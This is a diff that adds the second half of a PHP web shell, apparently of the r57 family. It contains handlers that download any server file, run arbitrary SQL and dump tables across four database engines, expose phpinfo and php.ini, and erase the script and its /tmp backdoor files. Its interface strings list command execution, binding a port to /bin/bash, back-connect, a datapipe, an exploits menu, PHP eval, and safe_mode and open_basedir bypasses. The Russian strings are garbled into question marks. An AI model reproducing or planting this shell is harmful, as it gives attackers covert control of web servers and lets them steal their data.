+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+color: #000000;
+}
+BODY {
+margin: 1px;
+color: #000000;
+background-color: #e4e0d8;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        } 
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    } 
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";            
+        $fr   .= "\x00\x00";            
+        $fr   .= "\x08\x00";            
+        $fr   .= $hexdtime;             
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);             
+        $fr      .= pack('V', $c_len);           
+        $fr      .= pack('V', $unc_len);         
+        $fr      .= pack('v', strlen($name));    
+        $fr      .= pack('v', 0);                
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x14\x00";                
+        $cdrec .= "\x00\x00";                
+        $cdrec .= "\x08\x00";                
+        $cdrec .= $hexdtime;                 
+        $cdrec .= pack('V', $crc);           
+        $cdrec .= pack('V', $c_len);         
+        $cdrec .= pack('V', $unc_len);       
+        $cdrec .= pack('v', strlen($name) ); 
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('v', 0 );             
+        $cdrec .= pack('V', 32 );            
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('v', sizeof($this -> ctrl_dir)) .  
+            pack('V', strlen($ctrldir)) .           
+            pack('V', strlen($data)) .              
+            "\x00\x00";              
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress')) 
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     } 
+     else if ($compress == 'gzip' && @function_exists('gzencode')) 
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     } 
+     else if ($compress == 'zip' && @function_exists('gzcompress')) 
+     {
+     	$filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     } 
+     else 
+     {
+     	$mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";	
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';	
+ var $base = '';	
+ var $db   = '';	
+ var $connection;
+ var $res;        
+ var $error;      
+ var $rows;       
+ var $columns;     
+ var $num_rows;   
+ var $num_fields; 
+ var $dump;       
+ 
+ function connect()
+  {	   
+  	switch($this->db)
+     {
+  	 case 'MySQL': 	
+  	  if(empty($this->port)) { $this->port = '3306'; }
+  	  if(!function_exists('mysql_connect')) return 0;
+  	  $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);	
+  	  if(is_resource($this->connection)) return 1;
+  	 break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+  	  if(!function_exists('mssql_connect')) return 0;
+  	  $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);	
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;   
+  }
+  
+ function select_db()
+  {
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 if(@mysql_select_db($this->base,$this->connection)) return 1;	
+    break;
+    case 'MSSQL':
+  	 if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;  
+  }
+  
+ function query($query)
+  { 
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+  	case 'MySQL': 	
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) 
+      { 
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      } 
+     else if(is_resource($this->res)) { return 1; }                   
+     return 2;                                                          
+  	break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection))) 
+      {
+      $this->error = 'Query error';
+      return 0;	
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;     
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2; 
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';	
+      }
+     else 
+      { 
+      if(@ociexecute($this->res)) 
+       {	
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;	
+       }
+      $error = @ocierror();
+      $this->error=$error['message']; 
+      }
+    break;
+    }	
+  return 0;
+  }
+ function get_result()
+  { 
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;	
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 $this->num_rows=@mysql_num_rows($this->res);
+  	 $this->num_fields=@mysql_num_fields($this->res);
+  	 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); 
+  	 @mysql_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+  	 $this->num_rows=@mssql_num_rows($this->res);
+  	 $this->num_fields=@mssql_num_fields($this->res);    
+  	 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+  	 @mssql_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+  	 $this->num_rows=@pg_num_rows($this->res); 
+  	 $this->num_fields=@pg_num_fields($this->res);   
+  	 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+  	 @pg_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0; 	
+  }
+ function dump($table)
+  { 
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 $this->dump[0] = '## MySQL dump';
+  	 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+  	 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}	
+  	  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  }	
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}	
+  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  }	
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} 	
+  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';	
+  	  } 	
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction'; 
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1; 	
+  }
+ function close()
+  { 
+   switch($this->db)
+    {
+  	case 'MySQL': 
+  	 @mysql_close($this->connection); 	
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }	
+  }
+ function affected_rows()
+  { 
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 return @mysql_affected_rows($this->res); 	
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }	
+  }
+ } 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else 
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");   
+    echo $filedump;
+    exit();
+   }		
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];	
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#e4e0d8>';
+ if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else 
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";	
+   else
+    {
+    foreach($querys as $num=>$query) 
+     {
+      if(strlen($query)>5)
+      {	
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;	
+       case '1': 
+       if($sql->get_result())
+        {
+       	echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+       	$keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>"; 
+        }
+       break;	
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); 
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;	 	
+       }	
+      }
+     }
+    }
+   }   
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; 
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }	
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'???? . ???????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+'ru_text111'=>'SQL-?????? : ????',
+'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
+'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
+'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
+'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
+'ru_text116'=>'?????????? ????',
+'ru_text117'=>'?',
+'ru_text118'=>'???? ??????????',
+'ru_text119'=>'?? ??????? ??????????? ????',
+'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
+'ru_err1'=>'??????! ?? ???? ????????? ???? ',
+'ru_err2'=>'??????! ?? ??????? ??????? ',
+'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
+'ru_err4'=>'?????? ??????????? ?? ftp ???????',
+'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
+'ru_err6'=>'??????! ?? ??????? ????????? ??????',
+'ru_err7'=>'?????? ??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
